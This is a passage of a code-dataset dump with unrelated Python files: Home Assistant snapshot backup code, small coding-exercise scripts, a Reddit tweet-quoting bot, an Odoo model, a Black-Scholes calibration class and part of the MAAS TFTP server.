CRYPTO_AES128\n\n def set_password(self, password: str) -> bool:\n \"\"\"Set the password for an existing snapshot.\"\"\"\n if not password:\n return False\n\n validating = password_for_validating(password)\n if validating != self._data[ATTR_PROTECTED]:\n return False\n\n self._init_password(password)\n return True\n\n def _init_password(self, password: str) -> None:\n \"\"\"Set password + init aes cipher.\"\"\"\n self._key = password_to_key(password)\n self._aes = Cipher(\n algorithms.AES(self._key),\n modes.CBC(key_to_iv(self._key)),\n backend=default_backend(),\n )\n\n def _encrypt_data(self, data: str) -> str:\n \"\"\"Make data secure.\"\"\"\n if not self._key or data is None:\n return data\n\n encrypt = self._aes.encryptor()\n padder = padding.PKCS7(128).padder()\n\n data = padder.update(data.encode()) + padder.finalize()\n return b64encode(encrypt.update(data)).decode()\n\n def _decrypt_data(self, data: str) -> str:\n \"\"\"Make data readable.\"\"\"\n if not self._key or data is None:\n return data\n\n decrypt = self._aes.decryptor()\n padder = padding.PKCS7(128).unpadder()\n\n data = padder.update(decrypt.update(b64decode(data))) + padder.finalize()\n return data.decode()\n\n async def load(self):\n \"\"\"Read snapshot.json from tar file.\"\"\"\n if not self.tarfile.is_file():\n _LOGGER.error(\"No tarfile %s\", self.tarfile)\n return False\n\n def _load_file():\n \"\"\"Read snapshot.json.\"\"\"\n with tarfile.open(self.tarfile, \"r:\") as snapshot:\n json_file = snapshot.extractfile(\"./snapshot.json\")\n return json_file.read()\n\n # read snapshot.json\n try:\n raw = await self.sys_run_in_executor(_load_file)\n except (tarfile.TarError, KeyError) as err:\n _LOGGER.error(\"Can't read snapshot tarfile %s: %s\", self.tarfile, err)\n return False\n\n # parse data\n try:\n raw_dict = json.loads(raw)\n except json.JSONDecodeError as err:\n _LOGGER.error(\"Can't read data for %s: %s\", self.tarfile, err)\n return False\n\n # validate\n try:\n self._data = SCHEMA_SNAPSHOT(raw_dict)\n except vol.Invalid as err:\n _LOGGER.error(\n \"Can't validate data for %s: %s\",\n self.tarfile,\n humanize_error(raw_dict, err),\n )\n return False\n\n return True\n\n async def __aenter__(self):\n \"\"\"Async context to open a snapshot.\"\"\"\n self._tmp = TemporaryDirectory(dir=str(self.sys_config.path_tmp))\n\n # create a snapshot\n if not self.tarfile.is_file():\n return self\n\n # extract an existing snapshot\n def _extract_snapshot():\n \"\"\"Extract a snapshot.\"\"\"\n with tarfile.open(self.tarfile, \"r:\") as tar:\n 
tar.extractall(path=self._tmp.name, members=secure_path(tar))\n\n await self.sys_run_in_executor(_extract_snapshot)\n\n async def __aexit__(self, exception_type, exception_value, traceback):\n \"\"\"Async context to close a snapshot.\"\"\"\n # exists snapshot or exception on build\n if self.tarfile.is_file() or exception_type is not None:\n self._tmp.cleanup()\n return\n\n # validate data\n try:\n self._data = SCHEMA_SNAPSHOT(self._data)\n except vol.Invalid as err:\n _LOGGER.error(\n \"Invalid data for %s: %s\", self.tarfile, humanize_error(self._data, err)\n )\n raise ValueError(\"Invalid config\") from None\n\n # new snapshot, build it\n def _create_snapshot():\n \"\"\"Create a new snapshot.\"\"\"\n with tarfile.open(self.tarfile, \"w:\") as tar:\n tar.add(self._tmp.name, arcname=\".\")\n\n try:\n write_json_file(Path(self._tmp.name, \"snapshot.json\"), self._data)\n await self.sys_run_in_executor(_create_snapshot)\n except (OSError, json.JSONDecodeError) as err:\n _LOGGER.error(\"Can't write snapshot: %s\", err)\n finally:\n self._tmp.cleanup()\n\n async def store_addons(self, addon_list=None):\n \"\"\"Add a list of add-ons into snapshot.\"\"\"\n addon_list = addon_list or self.sys_addons.installed\n\n async def _addon_save(addon):\n \"\"\"Task to store an add-on into snapshot.\"\"\"\n addon_file = SecureTarFile(\n Path(self._tmp.name, f\"{addon.slug}.tar.gz\"), \"w\", key=self._key\n )\n\n # Take snapshot\n try:\n await addon.snapshot(addon_file)\n except AddonsError:\n _LOGGER.error(\"Can't make snapshot from %s\", addon.slug)\n return\n\n # Store to config\n self._data[ATTR_ADDONS].append(\n {\n ATTR_SLUG: addon.slug,\n ATTR_NAME: addon.name,\n ATTR_VERSION: addon.version,\n ATTR_SIZE: addon_file.size,\n }\n )\n\n # Run tasks\n tasks = [_addon_save(addon) for addon in addon_list]\n if tasks:\n await asyncio.wait(tasks)\n\n async def restore_addons(self, addon_list=None):\n \"\"\"Restore a list add-on from snapshot.\"\"\"\n addon_list = addon_list or self.addon_list\n\n async def _addon_restore(addon_slug):\n \"\"\"Task to restore an add-on into snapshot.\"\"\"\n addon_file = SecureTarFile(\n Path(self._tmp.name, f\"{addon_slug}.tar.gz\"), \"r\", key=self._key\n )\n\n # If exists inside snapshot\n if not addon_file.path.exists():\n _LOGGER.error(\"Can't find snapshot for %s\", addon_slug)\n return\n\n # Perform a restore\n try:\n await self.sys_addons.restore(addon_slug, addon_file)\n except AddonsError:\n _LOGGER.error(\"Can't restore snapshot for %s\", addon_slug)\n\n # Run tasks\n tasks = [_addon_restore(slug) for slug in addon_list]\n if tasks:\n await asyncio.wait(tasks)\n\n async def store_folders(self, folder_list=None):\n \"\"\"Backup Supervisor data into snapshot.\"\"\"\n folder_list = set(folder_list or ALL_FOLDERS)\n\n def _folder_save(name):\n \"\"\"Internal function to snapshot a folder.\"\"\"\n slug_name = name.replace(\"/\", \"_\")\n tar_name = Path(self._tmp.name, f\"{slug_name}.tar.gz\")\n origin_dir = Path(self.sys_config.path_hassio, name)\n\n # Check if exists\n if not origin_dir.is_dir():\n _LOGGER.warning(\"Can't find snapshot folder %s\", name)\n return\n\n # Take snapshot\n try:\n _LOGGER.info(\"Snapshot folder %s\", name)\n with SecureTarFile(tar_name, \"w\", key=self._key) as tar_file:\n tar_file.add(\n origin_dir,\n arcname=\".\",\n filter=exclude_filter(MAP_FOLDER_EXCLUDE.get(name, [])),\n )\n\n _LOGGER.info(\"Snapshot folder %s done\", name)\n self._data[ATTR_FOLDERS].append(name)\n except (tarfile.TarError, OSError) as err:\n _LOGGER.warning(\"Can't 
snapshot folder %s: %s\", name, err)\n\n # Run tasks\n tasks = [\n self.sys_run_in_executor(_folder_save, folder) for folder in folder_list\n ]\n if tasks:\n await asyncio.wait(tasks)\n\n async def restore_folders(self, folder_list=None):\n \"\"\"Backup Supervisor data into snapshot.\"\"\"\n folder_list = set(folder_list or self.folders)\n\n def _folder_restore(name):\n \"\"\"Intenal function to restore a folder.\"\"\"\n slug_name = name.replace(\"/\", \"_\")\n tar_name = Path(self._tmp.name, f\"{slug_name}.tar.gz\")\n origin_dir = Path(self.sys_config.path_hassio, name)\n\n # Check if exists inside snapshot\n if not tar_name.exists():\n _LOGGER.warning(\"Can't find restore folder %s\", name)\n return\n\n # Clean old stuff\n if origin_dir.is_dir():\n remove_folder(origin_dir)\n\n # Perform a restore\n try:\n _LOGGER.info(\"Restore folder %s\", name)\n with SecureTarFile(tar_name, \"r\", key=self._key) as tar_file:\n tar_file.extractall(path=origin_dir, members=tar_file)\n _LOGGER.info(\"Restore folder %s done\", name)\n except (tarfile.TarError, OSError) as err:\n _LOGGER.warning(\"Can't restore folder %s: %s\", name, err)\n\n # Run tasks\n tasks = [\n self.sys_run_in_executor(_folder_restore, folder) for folder in folder_list\n ]\n if tasks:\n await asyncio.wait(tasks)\n\n def store_homeassistant(self):\n \"\"\"Read all data from Home Assistant object.\"\"\"\n self.homeassistant[ATTR_VERSION] = self.sys_homeassistant.version\n self.homeassistant[ATTR_WATCHDOG] = self.sys_homeassistant.watchdog\n self.homeassistant[ATTR_BOOT] = self.sys_homeassistant.boot\n self.homeassistant[ATTR_WAIT_BOOT] = self.sys_homeassistant.wait_boot\n\n # Custom image\n if self.sys_homeassistant.is_custom_image:\n self.homeassistant[ATTR_IMAGE] = self.sys_homeassistant.image\n self.homeassistant[\n ATTR_LAST_VERSION\n ] = self.sys_homeassistant.latest_version\n\n # API/Proxy\n self.homeassistant[ATTR_PORT] = self.sys_homeassistant.api_port\n self.homeassistant[ATTR_SSL] = self.sys_homeassistant.api_ssl\n self.homeassistant[ATTR_REFRESH_TOKEN] = self._encrypt_data(\n self.sys_homeassistant.refresh_token\n )\n\n # Audio\n self.homeassistant[ATTR_AUDIO_INPUT] = self.sys_homeassistant.audio_input\n self.homeassistant[ATTR_AUDIO_OUTPUT] = self.sys_homeassistant.audio_output\n\n def restore_homeassistant(self):\n \"\"\"Write all data to the Home Assistant object.\"\"\"\n self.sys_homeassistant.watchdog = self.homeassistant[ATTR_WATCHDOG]\n self.sys_homeassistant.boot = self.homeassistant[ATTR_BOOT]\n self.sys_homeassistant.wait_boot = self.homeassistant[ATTR_WAIT_BOOT]\n\n # Custom image\n if self.homeassistant.get(ATTR_IMAGE):\n self.sys_homeassistant.image = self.homeassistant[ATTR_IMAGE]\n self.sys_homeassistant.latest_version = self.homeassistant[\n ATTR_LAST_VERSION\n ]\n\n # API/Proxy\n self.sys_homeassistant.api_port = self.homeassistant[ATTR_PORT]\n self.sys_homeassistant.api_ssl = self.homeassistant[ATTR_SSL]\n self.sys_homeassistant.refresh_token = self._decrypt_data(\n self.homeassistant[ATTR_REFRESH_TOKEN]\n )\n\n # Audio\n self.sys_homeassistant.audio_input = self.homeassistant[ATTR_AUDIO_INPUT]\n self.sys_homeassistant.audio_output = self.homeassistant[ATTR_AUDIO_OUTPUT]\n\n # save\n self.sys_homeassistant.save_data()\n\n def store_repositories(self):\n \"\"\"Store repository list into snapshot.\"\"\"\n self.repositories = self.sys_config.addons_repositories\n\n def restore_repositories(self):\n \"\"\"Restore repositories from snapshot.\n\n Return a coroutine.\n \"\"\"\n return 
self.sys_store.update_repositories(self.repositories)\n","sub_path":"supervisor/snapshots/snapshot.py","file_name":"snapshot.py","file_ext":"py","file_size_in_byte":16162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"169898152","text":"# def filter_list(l):\n# new_list = []\n# for index in l:\n# if index is int:\n# new_list.append(index)\n# return new_list\n# # 'return a new list with the strings filtered out'\n\n# print(filter_list([1,2,'a','b']),[1,2])\n# print(filter_list([1,'a','b',0,15]),[1,0,15])\n# print(filter_list([1,2,'aasf','1','123',123]),[1,2,123])\n\ndef is_square(n):\n # root = n ** (1/2)\n # print(root)\n # if (n**(1/2)) % 1 == 0:\n # return True\n if n >= 0:\n return (n**0.5) % 1 == 0\n return False # fix me\n\n # return n >= 0 and (n**0.5) % 1 == 0\n\nprint(is_square(4))\nprint(is_square(1327898974))\n","sub_path":"training/codewars_0.py","file_name":"codewars_0.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"93451953","text":"import praw, tweepy\n\nfrom tweepy import OAuthHandler\n\n#Remember to fill out these fields\ntwi_key = ''\ntwi_secr = ''\ntwi_acc_tok = ''\ntwi_acc_sec = ''\n\ntwi = OAuthHandler(twi_key, twi_secr)\ntwi.set_access_token(twi_acc_tok, twi_acc_sec)\n\nt = tweepy.API(twi)\n\n#Fill out these too\nr = praw.Reddit(client_id='',client_secret='',password='your_password',user_agent='',username='redditUser')\n\npcmr = r.subreddit(\"all\")\n\nblacklisted = {'suicidewatch','depression'}\n\ndef allowed(submission):\n\tallComments = submission.comments\n\tisItAllowed = True;\n\tfor comm in allComments:\n\t\t#And fill out this with your bot username\n\t\tif comm.author.name in 'redditUser':\n\t\t\tisItAllowed = False\n\t\n\treturn isItAllowed\n\nfor submission in pcmr.stream.submissions():\n\turl = submission.url\n\tif allowed(submission) == True:\n\t\tif not submission.subreddit.display_name.lower() in blacklisted:\n\t\t\tif not \"twitter.com\" not in url:\n\t\t\t\tif not \"status\" not in url:\n\t\t\t\t\tprint(' ')\n\t\t\t\t\tprint(submission.shortlink)\n\t\t\t\t\tprint(url)\n\t\t\t\t\t\n\t\t\t\t\tid = url.split('/', 5)[5]\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\tnew = t.get_status(id)\n\t\t\t\t\tcont = new.text\n\n\t\t\t\t\tsubmission.reply('[Tweet by @' + str(new.user.screen_name) + ':]('+str(url)+')\\n\\n-------------------------\\n\\n' + str(cont)+'\\n\\n-------------------------\\n\\nThis is an experimental bot. 
Available on [GitHub](https://github.com/gronnmann/Twittzer).')\n","sub_path":"src/twittzer.py","file_name":"twittzer.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"640256835","text":"import math # для вещественных значений понадобится округление вверх и вниз (не математическое)\r\n\r\nuser_number1 = float(input('введите первое число (например: 5, 10, 8.9)\\n>>>'))\r\nuser_number2 = float(input('\\nвведите первое число (например: 5, 10, 8.9)\\n>>>'))\r\n\r\n# определяем меньшее и большее из введенных чисел\r\nmin_user_number = min(user_number1, user_number2)\r\nmax_user_number = max(user_number1, user_number2)\r\n\r\n# преобразовываем вещественные числа для цыкла\r\nnumber_start_range = math.ceil(min_user_number)\r\nnumber_end_range = math.floor(max_user_number) + 1 # +1 чтобы учесть последнее число в промежутке\r\n\r\nsuma_natural = 0\r\n\r\nfor i in range(number_start_range, number_end_range):\r\n suma_natural += i\r\n\r\n# выдаем формат чисел в зависимости от введенного формата пользователем\r\nif min_user_number - math.floor(min_user_number) == 0:\r\n print_user_number1 = int(min_user_number)\r\nelse:\r\n print_user_number1 = min_user_number\r\n\r\nif max_user_number - math.floor(max_user_number) == 0:\r\n print_user_number2 = int(max_user_number)\r\nelse:\r\n print_user_number2 = max_user_number\r\n\r\nprint('Сумма натуральных чисел между числом {} и числом {} = {}'.format(print_user_number1, print_user_number2, suma_natural))","sub_path":"hw_2_2.py","file_name":"hw_2_2.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"330740037","text":"# -*- coding: utf-8 -*-\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\nfrom odoo import api, fields, models, tools, SUPERUSER_ID, _\n\nclass KGDepositType(models.Model):\n _name = 'deposit.type'\n\n name = fields.Char(\n 'Name',\n required=True,\n )\n\n allow_pos = fields.Boolean(\n 'Allow POS',\n default=False,\n )\n","sub_path":"local/kg_account/models/deposit_type.py","file_name":"deposit_type.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"466935106","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 28 19:24:54 2018\n\n@author: andy\n\"\"\"\n\nimport pandas as pd\nfrom scipy import interpolate\nimport numpy as np\nimport os\nimport scipy.stats as stats\nfrom scipy.optimize import minimize\n\n# Calculate the Black Scholes price of European call option\ndef bs_price(s, k, p, T, q, sigma):\n\tF = s * np.exp(-q * T)/p\n\td1 = (np.log(F / k) + 0.5 * sigma**2 * T) / (sigma * np.sqrt(T))\n\td2 = d1 - sigma * np.sqrt(T)\n\tprice = p * (F * stats.norm.cdf(d1) - k * stats.norm.cdf(d2))\n\treturn price\n\t\t\t\t\nclass Stock_calibrate_BS:\n\t\"\"\"\n\tBS model calibration, assuming deterministic short rates and constant dividend\n\t\"\"\"\n\tdef __init__(self):\n\t\t\"\"\"\n\t\t1. Compute BS vol using Black Formula. \n\t\t2. 
self.simga is a function that takes in (S_t,t,r_t), although the arguments do not affect the value returned (just to be consistent with LV sigma function)\n\t\t\"\"\"\n\t\t# Import raw data\n\t\tdf_stock_stats = pd.read_csv(os.path.join(\"data\", \"Stock.csv\"), index_col=0, header=None)\n\t\tspot_str = df_stock_stats.loc['Price'].squeeze()\n\t\tself.spot = float(spot_str)\n\t\tdiv_str = df_stock_stats.loc['div'].squeeze()\n\t\tself.q = float(div_str.strip(\"%\"))/100\n\t\tdf_s = pd.read_csv(os.path.join(\"data\",\"StockCall_shortterm.csv\"),index_col=0)\n\t\tdf_m = pd.read_csv(os.path.join(\"data\",\"StockCall_midterm.csv\"),index_col=0)\n\t\tdf_l = pd.read_csv(os.path.join(\"data\",\"StockCall_longterm.csv\"),index_col=0)\n\t\t\n\t\t# Drop deep ITM options data which have little liquidity\n\t\tself.df_all = pd.concat([df_s, df_m,df_l], axis=1)\n\t\tself.df_all = self.df_all.loc[self.df_all.index >=2500]\n\t\tself.df_all = self.df_all.loc[self.df_all.index<=3500 ]\n\t\t# Euro bond price\n\t\tdf_Yield = pd.read_csv(os.path.join(\"data\",\"GERYield.csv\"),\n\t\t header = None, delimiter = \"\\t\", index_col=0)\n\t\tT = np.array(df_Yield.index)\n\t\tyields = np.array(df_Yield.loc[:,1])\n\t\tself.yields_interp = interpolate.interp1d(T.squeeze(), yields, 'cubic', fill_value='extrapolate')\n\t\t\n\t\tT_indays = self.df_all.columns.astype(float)\n\t\tself.T_inyears = T_indays/365.0\n\t\t\n\t\tself.observed_prices = np.array(self.df_all)\n\t\tres = minimize(lambda x: self.fit_MSE(x),0.2,method='BFGS', tol=1.0)\n\t\tprint(\"BS impvol:\", res.x[0])\n\t\tdef BS_impvol(s,t,r):\n\t\t\treturn res.x[0]\n\t\tself.sigma = BS_impvol\n\t\t\n\tdef get_fitted_call_price(self,sig):\n\t\tfitted_prices = np.zeros(self.observed_prices.shape)\n\t\tfor j,K in enumerate(self.df_all.index):\n\t\t\tfor i in range(len(self.T_inyears)):\n\t\t\t\tT = self.T_inyears[i]\n\t\t\t\tp = self.Euro_bond_price(T)\n\t\t\t\tfitted_prices[j,i] = bs_price(self.spot,K,p,T,self.q,sig)\n\t\t\n\t\treturn fitted_prices\n\t\n\tdef fit_MSE(self,sig):\n\t\tfitted_prices=self.get_fitted_call_price(sig)\n\t\terr = (fitted_prices-self.observed_prices)**2\n\t\treturn np.nanmean(err)\n\t\t\n\tdef Euro_bond_price(self,T):\n\t\tT_yield = self.yields_interp(T)\n\t\tprice = (1+T_yield/100)**(-T)\n\t\treturn price\n\n\n","sub_path":"Stock_BS_calibrate.py","file_name":"Stock_BS_calibrate.py","file_ext":"py","file_size_in_byte":2834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"85039509","text":"#!/bin/python3\n\n# https://www.hackerrank.com/contests/hourrank-26/challenges/pair-sums\n\nimport sys\n\ndef prod_nchoose2(arr):\n if len(A) == 1:\n return arr\n for i in range(len(arr)):\n for j in range(len(arr[i+1:])):\n yield arr[i] * arr[i+1:][j]\n\ndef largestValue(A):\n # Return the largest value of any of A's nonempty subarrays.\n # for prod in prod_nchoose2(A):\n # print(prod)\n # print(sum(prod_nchoose2(A)))\n if len(A) == 1:\n return A[0]\n curr_sumprod = 0\n max_sumprod = 0\n start = 0\n end = 0\n while end < len(A):\n # print(start, end)\n subarray = A[start:end]\n sumprod = sum(prod_nchoose2(subarray))\n curr_sumprod = max(curr_sumprod, sumprod)\n max_sumprod = max(max_sumprod, curr_sumprod)\n if start == end:\n start = 0\n end += 1\n continue\n start += 1\n return max_sumprod\n\nif __name__ == \"__main__\":\n n = int(input().strip())\n A = list(map(int, input().strip().split(' ')))\n result = largestValue(A)\n 
print(result)\n","sub_path":"hackerrank/all_contests/hourrank/26/x_pair_sums.py","file_name":"x_pair_sums.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"492760228","text":"# Copyright 2012-2016 Canonical Ltd. This software is licensed under the\n# GNU Affero General Public License version 3 (see the file LICENSE).\n\n\"\"\"Twisted Application Plugin for the MAAS TFTP server.\"\"\"\n\n__all__ = [\n \"TFTPBackend\",\n \"TFTPService\",\n ]\n\nfrom functools import partial\nfrom socket import (\n AF_INET,\n AF_INET6,\n)\n\nfrom netaddr import IPAddress\nfrom provisioningserver.boot import (\n BootMethodRegistry,\n get_remote_mac,\n)\nfrom provisioningserver.drivers import ArchitectureRegistry\nfrom provisioningserver.drivers.osystem import OperatingSystemRegistry\nfrom provisioningserver.events import (\n EVENT_TYPES,\n send_node_event_mac_address,\n)\nfrom provisioningserver.kernel_opts import KernelParameters\nfrom provisioningserver.logger import (\n get_maas_logger,\n LegacyLogger,\n)\nfrom provisioningserver.rpc.boot_images import list_boot_images\nfrom provisioningserver.rpc.exceptions import BootConfigNoResponse\nfrom provisioningserver.rpc.region import (\n GetBootConfig,\n MarkNodeFailed,\n)\nfrom provisioningserver.utils import (\n tftp,\n typed,\n)\nfrom provisioningserver.utils.network import get_all_interface_addresses\nfrom provisioningserver.utils.tftp import TFTPPath\nfrom provisioningserver.utils.twisted import (\n deferred,\n RPCFetcher,\n)\nfrom tftp.backend import FilesystemSynchronousBackend\nfrom tftp.errors import (\n BackendError,\n FileNotFound,\n)\nfrom tftp.protocol import TFTP\nfrom twisted.application import internet\nfrom twisted.application.service import MultiService\nfrom twisted.internet import (\n reactor,\n udp,\n)\nfrom twisted.internet.abstract import isIPv6Address\nfrom twisted.internet.address import (\n IPv4Address,\n IPv6Address,\n)\nfrom twisted.internet.defer import (\n inlineCallbacks,\n maybeDeferred,\n returnValue,\n succeed,\n)\nfrom twisted.internet.task import deferLater\nfrom twisted.python.filepath import FilePath\n\n\nmaaslog = get_maas_logger(\"tftp\")\nlog = LegacyLogger()\n\n\ndef get_boot_image(params):\n \"\"\"Get the boot image for the params on this rack controller.\"\"\"\n # Match on purpose; enlist uses the commissioning purpose.\n purpose = params[\"purpose\"]\n if purpose == \"enlist\":\n purpose = \"commissioning\"\n\n # Get the matching boot images, minus subarchitecture.\n boot_images = list_boot_images()\n boot_images = [\n image\n for image in boot_images\n if (image['osystem'] == params['osystem'] and\n image['release'] == params['release'] and\n image['architecture'] == params['arch'] and\n image['purpose'] == purpose)\n ]\n\n # See if exact subarchitecture match.\n for image in boot_images:\n maaslog.error(\"DEBUG: Image subarch - %s Params subarch - %s\" % (image[\"subarchitecture\"], params[\"subarch\"]))\n if image[\"subarchitecture\"] == params[\"subarch\"]:\n return image\n\n # Not exact match check if subarchitecture is in the supported\n # subarchitectures list.\n for image in boot_images:\n subarches = image.get(\"supported_subarches\", \"\")\n maaslog.error(\"DEBUG: Supported subarches - %s\" % subarches)\n subarches = subarches.split(\",\")\n if params[\"subarch\"] in subarches:\n return image\n\n # No matching boot image was found.\n return None\n\n\ndef log_request(mac_address, file_name, clock=reactor):\n 
\"\"\"Log a TFTP request.\n\n This will be logged to the regular log, and also to the node event log at\n a later iteration of the `clock` so as to not delay the task currently in\n progress.\n \"\"\"\n # If the file name is a byte string, decode it as ASCII, replacing\n # non-ASCII characters, so that we have at least something to log.\n if isinstance(file_name, bytes):\n file_name = file_name.decode(\"ascii\", \"replace\")\n # Log to the regular log.\n log.info(\n \"{file_name} requested by {mac_address}\", file_name=file_name,\n mac_address=mac_address)\n # Log to the node event log.\n d = deferLater(\n clock, 0, send_node_event_mac_address,\n event_type=EVENT_TYPES.NODE_TFTP_REQUEST,\n mac_address=mac_address, description=file_name)\n d.addErrback(log.err, \"Logging TFTP request failed.\")\n\n\nclass TFTPBackend(FilesystemSynchronousBackend):\n \"\"\"A partially dynamic read-only TFTP server.\n\n Static files such as kernels and initrds, as well as any non-MAAS files\n that the system may already be set up to serve, are served up normally.\n But PXE configurations are generated on the fly.\n\n When a PXE configuration file is requested, the server asynchronously\n requests the appropriate parameters from the API (at a configurable\n \"generator URL\") and generates a config file based on those.\n\n The regular expressions `re_config_file` and `re_mac_address` specify\n which files the server generates on the fly. Any other requests are\n passed on to the filesystem.\n\n Passing requests on to the API must be done very selectively, because\n failures cause the boot process to halt. This is why the expression for\n matching the MAC address is so narrowly defined: PXELINUX attempts to\n fetch files at many similar paths which must not be passed on.\n \"\"\"\n\n def __init__(self, base_path, client_service):\n \"\"\"\n :param base_path: The root directory for this TFTP server.\n :param client_service: The RPC client service for the rack controller.\n \"\"\"\n if not isinstance(base_path, FilePath):\n base_path = FilePath(base_path)\n super(TFTPBackend, self).__init__(\n base_path, can_read=True, can_write=False)\n self.client_to_remote = {}\n self.client_service = client_service\n self.fetcher = RPCFetcher()\n\n def _get_new_client_for_remote(self, remote_ip):\n \"\"\"Return a new client for the `remote_ip`.\n\n Don't use directly called from `get_client_for`.\n \"\"\"\n def store_client(client):\n self.client_to_remote[remote_ip] = client\n return client\n\n d = self.client_service.getClientNow()\n d.addCallback(store_client)\n return d\n\n def get_client_for(self, params):\n \"\"\"Always gets the same client based on `params`.\n\n This is done so that all TFTP requests from the same remote client go\n to the same regiond process. 
`RPCFetcher` only duplciate on the client\n and arguments, so if the client is not the same the duplicate effort\n is not consolidated.\n \"\"\"\n remote_ip = params.get('remote_ip')\n if remote_ip:\n client = self.client_to_remote.get(remote_ip, None)\n if client is None:\n # Get a new client for the remote_ip.\n return self._get_new_client_for_remote(remote_ip)\n else:\n # Check that the existing client is still valid.\n clients = self.client_service.getAllClients()\n if client in clients:\n return succeed(client)\n else:\n del self.client_to_remote[remote_ip]\n return self._get_new_client_for_remote(remote_ip)\n else:\n return self.client_service.getClientNow()\n\n @inlineCallbacks\n @typed\n def get_boot_method(self, file_name: TFTPPath):\n \"\"\"Finds the correct boot method.\"\"\"\n for _, method in BootMethodRegistry:\n params = yield maybeDeferred(method.match_path, self, file_name)\n if params is not None:\n params[\"bios_boot_method\"] = method.bios_boot_method\n returnValue((method, params))\n returnValue((None, None))\n\n def get_boot_image(self, params, client, remote_ip):\n \"\"\"Get the boot image for the params on this rack controller.\n\n Calls `MarkNodeFailed` for the machine if its a known machine.\n \"\"\"\n is_ephemeral = False\n try:\n osystem_obj = OperatingSystemRegistry.get_item(params['osystem'],\n default=None)\n purposes = osystem_obj \\\n .get_boot_image_purposes(params[\"arch\"], params[\"subarch\"],\n params.get(\"release\", \"\"),\n params.get(\"label\", \"\"))\n if \"ephemeral\" in purposes:\n is_ephemeral = True\n except:\n pass\n\n system_id = params.pop(\"system_id\", None)\n if params[\"purpose\"] == \"local\" and not is_ephemeral:\n # Local purpose doesn't use a boot image so jsut set the label\n # to \"local\", but this value will no be used.\n params[\"label\"] = \"local\"\n return params\n else:\n if params[\"purpose\"] == \"local\" and is_ephemeral:\n params[\"purpose\"] = \"ephemeral\"\n boot_image = get_boot_image(params)\n if boot_image is None:\n # No matching boot image.\n description = \"Missing boot image %s/%s/%s/%s.\" % (\n params['osystem'], params[\"arch\"],\n params[\"subarch\"], params[\"release\"])\n # Call MarkNodeFailed if this was a known machine.\n if system_id is not None:\n d = client(\n MarkNodeFailed,\n system_id=system_id,\n error_description=description)\n d.addErrback(\n log.err,\n \"Failed to mark machine failed: %s\" % description)\n else:\n maaslog.error(\n \"Enlistment failed to boot %s; missing required boot \"\n \"image %s/%s/%s/%s.\" % (\n remote_ip,\n params['osystem'], params[\"arch\"],\n params[\"subarch\"], params[\"release\"]))\n params[\"label\"] = \"no-such-image\"\n else:\n params[\"label\"] = boot_image[\"label\"]\n return params\n\n @deferred\n def get_kernel_params(self, params):\n \"\"\"Return kernel parameters obtained from the API.\n\n :param params: Parameters so far obtained, typically from the file\n path requested.\n :return: A `KernelParameters` instance.\n \"\"\"\n # Extract from params only those arguments that GetBootConfig cares\n # about; params is a context-like object and other stuff (too much?)\n # gets in there.\n arguments = (\n name.decode(\"ascii\")\n for name, _ in GetBootConfig.arguments\n )\n params = {\n name: params[name] for name in arguments\n if name in params\n }\n\n def fetch(client, params):\n params[\"system_id\"] = client.localIdent\n d = self.fetcher(client, GetBootConfig, **params)\n d.addCallback(self.get_boot_image, client, params['remote_ip'])\n d.addCallback(lambda 
data: KernelParameters(**data))\n return d\n\n d = self.get_client_for(params)\n d.addCallback(fetch, params)\n return d\n\n @deferred\n def get_boot_method_reader(self, boot_method, params):\n \"\"\"Return an `IReader` for a boot method.\n\n :param boot_method: Boot method that is generating the config\n :param params: Parameters so far obtained, typically from the file\n path requested.\n \"\"\"\n def generate(kernel_params):\n return boot_method.get_reader(\n self, kernel_params=kernel_params, **params)\n\n return self.get_kernel_params(params).addCallback(generate)\n\n @staticmethod\n def no_response_errback(failure, file_name):\n failure.trap(BootConfigNoResponse)\n # Convert to a TFTP file not found.\n raise FileNotFound(file_name)\n\n @deferred\n @typed\n def handle_boot_method(self, file_name: TFTPPath, result):\n boot_method, params = result\n if boot_method is None:\n return super(TFTPBackend, self).get_reader(file_name)\n\n # Map pxe namespace architecture names to MAAS's.\n arch = params.get(\"arch\")\n if arch is not None:\n maasarch = ArchitectureRegistry.get_by_pxealias(arch)\n if maasarch is not None:\n params[\"arch\"] = maasarch.name.split(\"/\")[0]\n\n # Send the local and remote endpoint addresses.\n local_host, local_port = tftp.get_local_address()\n params[\"local_ip\"] = local_host\n remote_host, remote_port = tftp.get_remote_address()\n params[\"remote_ip\"] = remote_host\n d = self.get_boot_method_reader(boot_method, params)\n return d\n\n @staticmethod\n def all_is_lost_errback(failure):\n if failure.check(BackendError):\n # This failure is something that the TFTP server knows how to deal\n # with, so pass it through.\n return failure\n else:\n # Something broke badly; record it.\n log.err(failure, \"TFTP back-end failed.\")\n # Don't keep people waiting; tell them something broke right now.\n raise BackendError(failure.getErrorMessage())\n\n @deferred\n @typed\n def get_reader(self, file_name: TFTPPath):\n \"\"\"See `IBackend.get_reader()`.\n\n If `file_name` matches a boot method then the response is obtained\n from that boot method. Otherwise the filesystem is used to service\n the response.\n \"\"\"\n # It is possible for a client to request the file with '\\' instead\n # of '/', example being 'bootx64.efi'. 
